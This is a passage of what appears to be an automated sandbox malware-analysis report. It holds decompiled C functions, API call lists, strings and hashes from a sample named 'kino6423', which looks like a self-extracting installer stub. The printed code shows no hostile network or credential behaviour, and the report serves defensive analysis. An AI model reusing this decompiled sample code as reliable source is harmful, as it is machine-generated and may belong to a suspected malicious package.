						goto L11;
					}
					 *0xe591dc = 1;
					goto L8;
				}
				return 0;
			}

0x00e53459
0x00e5345c
0x00e534d8
0x00e534de
0x00000000
0x00e534e0
0x00e5345e
0x00e53463
0x00e5349a
0x00e534a0
0x00e534a7
0x00e534b2
0x00e534c4
0x00e534cb
0x00000000
0x00e534cb
0x00e53468
0x00e5346e
0x00e53474
0x00000000
0x00000000
0x00e5347c
0x00e5348c
0x00e53490
0x00000000
0x00e53496
0x00e53484
0x00000000
0x00000000
0x00e53486
0x00000000
0x00e53486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00E53490
GetDesktopWindow.USER32 ref: 00E5349A
SetWindowTextA.USER32(?,doza2), ref: 00E534B2
SetDlgItemTextA.USER32(?,00000838), ref: 00E534C4
SetForegroundWindow.USER32(?), ref: 00E534CB
EndDialog.USER32(?,00000002), ref: 00E534D8

Strings

doza2, xrefs: 00E534AC

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: doza2
API String ID: 852535152-612509477
Opcode ID: a2f5ca4b644d64865cf895d974ca05888f54bf4a901c6b9c6d763470d76f3daf
Instruction ID: 6f497a27af9d6e7f8fc070e710742e9cce590a49071fee4695fee0b5ec651faa
Opcode Fuzzy Hash: a2f5ca4b644d64865cf895d974ca05888f54bf4a901c6b9c6d763470d76f3daf
Instruction Fuzzy Hash: 8801F131241624AFC71A1F76DD0C8AD3B60EB05783F049C20FE62B69A0CB308F49DB82

Uniqueness

Uniqueness Score: -1.00%

Function 00E52AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00E52AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0xe58004; // 0x5ba1a886
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0xe59a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00E51680(_t65, E00E517C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E00E565E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00E51680(_t65, E00E517C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00E56CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00e52aac
0x00e52ab7
0x00e52abc
0x00e52abe
0x00e52ac3
0x00e52ac6
0x00e52ac9
0x00e52ace
0x00e52ae6
0x00e52bdc
0x00e52bdc
0x00e52be0
0x00000000
0x00000000
0x00e52af2
0x00e52afc
0x00e52b00
0x00e52b05
0x00e52b05
0x00e52b0b
0x00e52bca
0x00e52bd1
0x00e52b11
0x00e52b18
0x00e52b26
0x00e52b99
0x00e52bc8
0x00000000
0x00000000
0x00e52b9b
0x00e52bae
0x00e52bb3
0x00e52bb5
0x00e52bb5
0x00e52bb8
0x00e52bb8
0x00e52bba
0x00e52bbb
0x00000000
0x00e52bb8
0x00e52b28
0x00e52b2e
0x00e52b33
0x00e52b39
0x00e52b3c
0x00e52b3c
0x00e52b3e
0x00e52b3f
0x00e52b55
0x00e52b5d
0x00e52b64
0x00e52b64
0x00e52b7a
0x00e52b7f
0x00e52b81
0x00e52b81
0x00e52b84
0x00e52b84
0x00e52b86
0x00e52b87
0x00e52bbf
0x00e52bc1
0x00e52bc1
0x00e52b26
0x00e52bda
0x00e52bda
0x00e52be6
0x00e52be6
0x00e52bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00E52AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00E52AF2
CharNextA.USER32(?), ref: 00E52B12
CharUpperA.USER32 ref: 00E52B1E
CharPrevA.USER32(?,?), ref: 00E52B55
CharNextA.USER32(?), ref: 00E52BD4

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 715731df9b5ba059c493e700a16315eb40b7ec21699b89b8b803797c3cdf4a5f
Instruction ID: 42be05e75e5ba2602dcc4bf25db0501726d1cc9a2ed39c525ccbf4f941d772b0
Opcode Fuzzy Hash: 715731df9b5ba059c493e700a16315eb40b7ec21699b89b8b803797c3cdf4a5f
Instruction Fuzzy Hash: 724112345042459FDB599F348C04AFD7BA99F57306F1809AEEDC2B3202DB254E8E8B60

Uniqueness

Uniqueness Score: -1.00%

Function 00E528E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E528E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00E52773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t11 =  &_v32; // 0xe53938
						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									_t16 =  &_v32; // 0xe53938
									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00E52A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00E52A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x00e528f1
0x00e528f4
0x00e528f7
0x00e528f9
0x00e528fc
0x00e528ff
0x00e52901
0x00e52907
0x00e52a62
0x00e52a64
0x00e5290d
0x00e5290d
0x00e5290f
0x00e52912
0x00e52920
0x00e52937
0x00000000
0x00000000
0x00e5293d
0x00e52944
0x00e5294a
0x00e5294f
0x00e52a2f
0x00e52a32
0x00e52a34
0x00e52a37
0x00e52a41
0x00000000
0x00000000
0x00e52955
0x00e5295e
0x00e52962
0x00e52969
0x00e5296f
0x00e52974
0x00e5297e
0x00e5298c
0x00e52a20
0x00e52a21
0x00e52a27
0x00e52a4c
0x00e52a4f
0x00e52a50
0x00e52a53
0x00e52a56
0x00e52a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00e529b2
0x00e529b2
0x00e529b5
0x00e529bd
0x00e529c3
0x00e529cc
0x00e529d5
0x00e529d7
0x00e529da
0x00e529dd
0x00e529df
0x00e529ec
0x00e529f8
0x00e529fc
0x00e529ff
0x00e52a02
0x00e52a07
0x00e52a0a
0x00e52a0f
0x00e52a19
0x00e52a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00e52a0f
0x00e5298c
0x00e52974
0x00e52962
0x00000000
0x00e5294f
0x00e52912
0x00e52a65
0x00e52a68
0x00e52a6c
0x00e52a6f
0x00e52a6f
0x00e52a7d

APIs

GlobalFree.KERNEL32 ref: 00E52A6F

Part of subcall function 00E52773: CharUpperA.USER32(5BA1A886,00000000,00000000,00000000), ref: 00E527A8
Part of subcall function 00E52773: CharNextA.USER32(0000054D), ref: 00E527B5
Part of subcall function 00E52773: CharNextA.USER32(00000000), ref: 00E527BC
Part of subcall function 00E52773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E52829
Part of subcall function 00E52773: RegQueryValueExA.ADVAPI32(?,00E51140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E52852
Part of subcall function 00E52773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E52870
Part of subcall function 00E52773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E528A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00E53938,?,?,?,?,-00000005), ref: 00E52958
GlobalLock.KERNEL32 ref: 00E52969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E53938,?,?,?,?,-00000005,?), ref: 00E52A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00E53938,?,?), ref: 00E52A81

Strings

89, xrefs: 00E5293D, 00E5297E, 00E52940

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID: 89
API String ID: 3949799724-2925746602
Opcode ID: 68370990c03ea3920c01dbb2f6f34a6756f7e0737d291745c69740d8a78f9a7f
Instruction ID: 4ad7f121b6f051299055f714ed1e2a0d537abca9180897f82a65df899a5d4e53
Opcode Fuzzy Hash: 68370990c03ea3920c01dbb2f6f34a6756f7e0737d291745c69740d8a78f9a7f
Instruction Fuzzy Hash: 8D514831D00219DFCB25CF99C884AAEBBB5FF49706F14452AEA15F3252D7309945DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E543D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00E543D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0xe58004; // 0x5ba1a886
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00E56CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x00e543d0
0x00e543d8
0x00e543df
0x00e543e6
0x00e543ec
0x00e543f1
0x00e54400
0x00e54403
0x00e5440b
0x00e54420
0x00e54429
0x00e54437
0x00e54444
0x00e54447
0x00e5444d
0x00e54454
0x00e5445b
0x00e54460
0x00e54461
0x00e54467
0x00e5446f
0x00e54473
0x00e54473
0x00e54463
0x00e54463
0x00e54463
0x00e5447a
0x00e54481
0x00e54484
0x00e5448a
0x00e54492
0x00e54496
0x00e54496
0x00e54486
0x00e54486
0x00e54486
0x00e544b8

APIs

GetWindowRect.USER32(?,?), ref: 00E543F1
GetWindowRect.USER32(00000000,?), ref: 00E5440B
GetDC.USER32(?), ref: 00E54423
GetDeviceCaps.GDI32(00000000,00000008), ref: 00E5442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00E5443A
ReleaseDC.USER32(?,00000000), ref: 00E54447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00E544A2

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 57c59f6504e63cb6022d0a3116b7f8ff6842b4df0f50914063908bc00c99bd96
Instruction ID: 92444369b06e0e45ddc8a850a43777ec3e038f7aeceb360274d4f3fb19e51c93
Opcode Fuzzy Hash: 57c59f6504e63cb6022d0a3116b7f8ff6842b4df0f50914063908bc00c99bd96
Instruction Fuzzy Hash: 28316372E00619AFCB14CFB9DD489EEBBB5EB89311F154669F905F3280DA306D49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E56298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00E56298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0xe58004; // 0x5ba1a886
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E00E5171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0xe59124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0xe5a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E00E5171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00E56CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00e56298
0x00e562a0
0x00e562a7
0x00e562ad
0x00e562af
0x00e562bb
0x00e562c3
0x00e562c4
0x00e5633b
0x00e5633b
0x00e56345
0x00e5634d
0x00000000
0x00000000
0x00e562da
0x00e562de
0x00e5635f
0x00e56369
0x00e562e0
0x00e562e0
0x00e562e0
0x00e562e3
0x00e562e5
0x00e562e5
0x00e562e8
0x00e562e8
0x00e562ea
0x00e562eb
0x00e562ef
0x00e562f1
0x00e562f3
0x00e56302
0x00e56308
0x00e5630d
0x00e56314
0x00e56314
0x00e56316
0x00e56319
0x00e56355
0x00e56357
0x00e5631b
0x00e5631b
0x00e56331
0x00e56334
0x00e56339
0x00000000
0x00e56339
0x00e56319
0x00e5636b
0x00e5637d
0x00e5637d
0x00000000

APIs

Part of subcall function 00E5171E: _vsnprintf.MSVCRT ref: 00E51750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00E551CA,00000004,00000024,00E52F71,?,00000002,00000000), ref: 00E562CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E551CA,00000004,00000024,00E52F71,?,00000002,00000000), ref: 00E562D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E551CA,00000004,00000024,00E52F71,?,00000002,00000000), ref: 00E5631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00E56345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E551CA,00000004,00000024,00E52F71,?,00000002,00000000), ref: 00E56357

Strings

UPDFILE%lu, xrefs: 00E562B3, 00E56329

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 8f0d97c98a335fedb877f5e1f394f0ccacdcaa72001a2ff22009f17660f54508
Instruction ID: eebcc98701a3cbde3ef0bc7c86bcc1debedd59817be0acee832ec877f4d9d303
Opcode Fuzzy Hash: 8f0d97c98a335fedb877f5e1f394f0ccacdcaa72001a2ff22009f17660f54508
Instruction Fuzzy Hash: 1B21E475A00219AFDB149F65CC459FFBB78EB88716F041A29FD02B3251DB359D0A8BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00E53A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E53A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E00E5468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0xe58d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E00E5468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0xe58d4c, "<None>") == 0) {
							LocalFree( *0xe58d4c);
							L9:
							 *0xe59124 = 0;
							return 1;
						}
						_t9 = E00E56517(_t19, 0x7d1, 0, E00E53100, 0, 0);
						LocalFree( *0xe58d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0xe59124 = 0x800704c7;
						L2:
						return 0;
					}
					E00E544B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0xe58d4c);
					 *0xe59124 = 0x80070714;
					goto L2;
				}
				E00E544B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xe59124 = E00E56285();
				goto L2;
			}

0x00e53a46
0x00e53a57
0x00e53a5d
0x00e53a63
0x00e53a6a
0x00e53a91
0x00e53a9a
0x00e53ad8
0x00e53b13
0x00e53b19
0x00e53b1b
0x00000000
0x00e53b21
0x00e53ae7
0x00e53af4
0x00e53afc
0x00000000
0x00000000
0x00e53afe
0x00e53a87
0x00000000
0x00e53a87
0x00e53aa8
0x00e53ab3
0x00e53ab9
0x00000000
0x00e53ab9
0x00e53a78
0x00e53a82
0x00000000

APIs

Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546A0
Part of subcall function 00E5468F: SizeofResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546A9
Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546C3
Part of subcall function 00E5468F: LoadResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546CC
Part of subcall function 00E5468F: LockResource.KERNEL32(00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546D3
Part of subcall function 00E5468F: memcpy_s.MSVCRT ref: 00E546E5
Part of subcall function 00E5468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E52F64,?,00000002,00000000), ref: 00E53A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00E53AB3

Part of subcall function 00E544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E54518
Part of subcall function 00E544B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00E54554

Part of subcall function 00E56285: GetLastError.KERNEL32(00E55BBC), ref: 00E56285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00E53AD0
LocalFree.KERNEL32 ref: 00E53B13

Part of subcall function 00E56517: FindResourceA.KERNEL32(00E50000,000007D6,00000005), ref: 00E5652A
Part of subcall function 00E56517: LoadResource.KERNEL32(00E50000,00000000,?,?,00E52EE8,00000000,00E519E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E56538
Part of subcall function 00E56517: DialogBoxIndirectParamA.USER32(00E50000,00000000,00000547,00E519E0,00000000), ref: 00E56557
Part of subcall function 00E56517: FreeResource.KERNEL32(00000000,?,?,00E52EE8,00000000,00E519E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E56560

LocalFree.KERNEL32(00000000,00E53100,00000000,00000000), ref: 00E53AF4

Strings

LICENSE, xrefs: 00E53A46
<None>, xrefs: 00E53AC5

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: a3ed1a8fe085808f71419a7f654fbca8a2485c9a2fe62fd1f29b48d7346e9b7b
Instruction ID: a49a5694f2f1e9db8b69375215dac971f2a8a11b3e3c4d5f876b6aa66bcf3ca4
Opcode Fuzzy Hash: a3ed1a8fe085808f71419a7f654fbca8a2485c9a2fe62fd1f29b48d7346e9b7b
Instruction Fuzzy Hash: 14118E70201301AFD768AB339D09E577AF9DBD5743B106D2EBA41F65F2DAB988088621

Uniqueness

Uniqueness Score: -1.00%

Function 00E524E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E524E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0xe58004; // 0x5ba1a886
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E00E5658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
